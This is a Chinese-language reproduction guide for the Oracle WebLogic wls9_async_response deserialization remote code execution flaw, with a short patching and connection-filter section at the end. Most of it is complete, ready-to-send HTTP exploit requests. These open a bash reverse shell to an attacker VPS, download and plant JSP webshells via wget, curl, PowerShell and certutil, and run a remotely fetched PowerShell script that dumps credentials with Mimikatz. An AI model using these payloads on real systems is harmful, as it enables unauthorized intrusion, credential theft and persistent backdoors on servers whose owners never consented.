0x1.背景
首先，CNVD收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞（CNVD-C-2019-48814）。[出自:jiwo.org]
0x2.漏洞描述
攻击者利用该漏洞，可在未授权的情况下远程执行命令。从相关信息来看。 部分版本WebLogic中默认包含的wls9_async_response包，为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者可以发送精心构造的恶意 HTTP 请求，获得目标服务器的权限，在未授权的情况下远程执行命令。 也就是说漏洞出现在 wls9_async_response.war 这个包里面，来详细看一看。
0x3.影响范围 
主要影响以下版本：
WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
0x4.复现漏洞环境 
而今天复现的就是第一个版本，即WebLogic Server 10.3.6.0(wls1036_generic.jar)。
Kali2019\Win10(关闭安全中心实时防护下)
漏洞组件：bea_wls9_async_response.war
漏洞路径:http://ip:port/_async/AsyncResponseService
漏洞确认:访问漏洞路径存在以下页面，即有可能存在漏洞

漏洞利用(所有利用都需要被攻击机能够访问公网)：
所有的POST报文都可以使用burpsuite完成，burpsuite破解、汉化、插件等相关教程：传送门
一、Linux下：
1、反弹shell
POST如下报文即可：

	
	

		POST /_async/AsyncResponseService HTTP/1.1
	

	

		Host: ip:port
	

	

		Content-Length: 853
	

	

		Accept-Encoding: gzip, deflate
	

	

		SOAPAction:
	

	

		Accept: */*
	

	

		User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
	

	

		Connection: keep-alive
	

	

		content-type: text/xml
	

	

		 
	

	

		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
	

	

		<soapenv:Header> 
	

	

		<wsa:Action>xx</wsa:Action>
	

	

		<wsa:RelatesTo>xx</wsa:RelatesTo>
	

	

		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
	

	

		<void class="java.lang.ProcessBuilder">
	

	

		<array class="java.lang.String" length="3">
	

	

		<void index="0">
	

	

		<string>/bin/bash</string>
	

	

		</void>
	

	

		<void index="1">
	

	

		<string>-c</string>
	

	

		</void>
	

	

		<void index="2">
	

	

		<string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string>
	

	

		</void>
	

	

		</array>
	

	

		<void method="start"/></void>
	

	

		</work:WorkContext>
	

	

		</soapenv:Header>
	

	

		<soapenv:Body>
	

	

		<asy:onAsyncDelivery/>
	

	

		</soapenv:Body></soapenv:Envelope>
	

2、上传webshell

1. 放置一个webshell.txt到公网
2. POST以下报文 任选其一

报文一：

	
	

		POST /_async/AsyncResponseService HTTP/1.1
	

	

		Host: ip:port
	

	

		Content-Length: 789
	

	

		Accept-Encoding: gzip, deflate
	

	

		SOAPAction:
	

	

		Accept: */*
	

	

		User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
	

	

		Connection: keep-alive
	

	

		content-type: text/xml
	

	

		 
	

	

		 
	

	

		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
	

	

		<soapenv:Header> 
	

	

		<wsa:Action>xx</wsa:Action>
	

	

		<wsa:RelatesTo>xx</wsa:RelatesTo>
	

	

		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
	

	

		<void class="java.lang.ProcessBuilder">
	

	

		<array class="java.lang.String" length="3">
	

	

		<void index="0">
	

	

		<string>/bin/bash</string>
	

	

		</void>
	

	

		<void index="1">
	

	

		<string>-c</string>
	

	

		</void>
	

	

		<void index="2">
	

	

		<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
	

	

		</void>
	

	

		</array>
	

	

		<void method="start"/></void>
	

	

		</work:WorkContext>
	

	

		</soapenv:Header>
	

	

		<soapenv:Body>
	

	

		<asy:onAsyncDelivery/>
	

	

		</soapenv:Body></soapenv:Envelope> 
	

报文二：

	
	

		POST /_async/AsyncResponseService HTTP/1.1
	

	

		Host: ip:port
	

	

		Content-Length: 789
	

	

		Accept-Encoding: gzip, deflate
	

	

		SOAPAction: 
	

	

		Accept: */*
	

	

		User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
	

	

		Connection: keep-alive
	

	

		content-type: text/xml
	

	

		 
	

	

		 
	

	

		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
	

	

		 
	

3、访问webshell

http://ip:port/_async/webshell.jsp



二、Windows下 
1、反弹shell
可直接使用黑客工具-后渗透工具-CobaltStrike生成一个payload.ps1 powershell脚本，将该脚本放到公网上，然后使用如下报文即可

	
	

		POST /_async/AsyncResponseService HTTP/1.1
	

	

		Host: ip:port
	

	

		Content-Length: 861
	

	

		Accept-Encoding: gzip, deflate
	

	

		SOAPAction:
	

	

		Accept: */*
	

	

		User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
	

	

		Connection: keep-alive
	

	

		content-type: text/xml
	

	

		 
	

	

		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
	

	

		<soapenv:Header> 
	

	

		<wsa:Action>xx</wsa:Action>
	

	

		<wsa:RelatesTo>xx</wsa:RelatesTo>
	

	

		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
	

	

		<void class="java.lang.ProcessBuilder">
	

	

		<array class="java.lang.String" length="3">
	

	

		<void index="0">
	

	

		<string>cmd</string>
	

	

		</void>
	

	

		<void index="1">
	

	

		<string>/c</string>
	

	

		</void>
	

	

		<void index="2">
	

	

		<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
	

	

		</void>
	

	

		</array>
	

	

		<void method="start"/></void>
	

	

		</work:WorkContext>
	

	

		</soapenv:Header>
	

	

		<soapenv:Body>
	

	

		<asy:onAsyncDelivery/>
	

	

		</soapenv:Body></soapenv:Envelope>
	

	

		 
	

2、上传webshell

1. 放置一个webshell.txt到公网
2. 使用以下报文 任选其一均可

报文一:

	
	

		POST /_async/AsyncResponseService HTTP/1.1
	

	

		Host: ip:port
	

	

		Content-Length: 854
	

	

		Accept-Encoding: gzip, deflate
	

	

		SOAPAction: 
	

	

		Accept: */*
	

	

		User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
	

	

		Connection: keep-alive
	

	

		content-type: text/xml
	

	

		 
	

	

		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
	

	

		 
	

报文二：

	
	

		POST /_async/AsyncResponseService HTTP/1.1
	

	

		Host: ip:port
	

	

		Content-Length: 854
	

	

		Accept-Encoding: gzip, deflate
	

	

		SOAPAction:
	

	

		Accept: */*
	

	

		User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
	

	

		Connection: keep-alive
	

	

		content-type: text/xml
	

	

		 
	

	

		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
	

	

		<soapenv:Header> 
	

	

		<wsa:Action>xx</wsa:Action>
	

	

		<wsa:RelatesTo>xx</wsa:RelatesTo>
	

	

		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
	

	

		<void class="java.lang.ProcessBuilder">
	

	

		<array class="java.lang.String" length="3">
	

	

		<void index="0">
	

	

		<string>cmd</string>
	

	

		</void>
	

	

		<void index="1">
	

	

		<string>/c</string>
	

	

		</void>
	

	

		<void index="2">
	

	

		<string>certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
	

	

		</void>
	

	

		</array>
	

	

		<void method="start"/></void>
	

	

		</work:WorkContext>
	

	

		</soapenv:Header>
	

	

		<soapenv:Body>
	

	

		<asy:onAsyncDelivery/>
	

	

		</soapenv:Body></soapenv:Envelope>
	

	

		3.访问webshell
	

	

		http://ip:port/_async/webshell.jsp
	

	

		 
	

(注：上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/为默认路径，如果路径修改，可以配合反弹shell进行获取)
0x5.缓解措施
高危：预计网上很快会有该远程代码执行漏洞的POC，建议尽快升级软件和使用连接筛选器临时拒绝T3/T3s协议。
建议尽快安装安全更新补丁（可以使用BSU智能更新）或使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议：
连接筛选器：weblogic.security.net.ConnectionFilterImpl
规则示例： 0.0.0.0/0 * 7001 deny t3 t3s#拒绝所有访问
允许和拒绝指定IP规则示例：
192.168.1.0/24 * 7001 allow t3 t3s#允许指定IP段访问
192.168.2.0/24 * 7001 deny t3 t3s#拒绝指定IP段访问
连接筛选器说明参考：
https://docs.oracle.com/cd/E24329_01/web.1211/e24485/con_filtr.htm#SCPRG377
威胁推演：此漏洞为远程代码执行漏洞，基于全球使用该产品用户的数量和暴露在网上的端口情况，恶意攻击者可能会开发针对该漏洞的自动化攻击程序、黑客工具，实现漏洞利用成功后自动植入后门程序，并进一步释放矿工程序或是DDOS僵尸木马等恶意程序，从而影响到网站服务的正常提供。
安全运营建议：Oracle WebLogic历史上已经报过多个安全漏洞（其中也有反序列化漏洞），建议使用该产品的企业经常关注官方安全更新公告。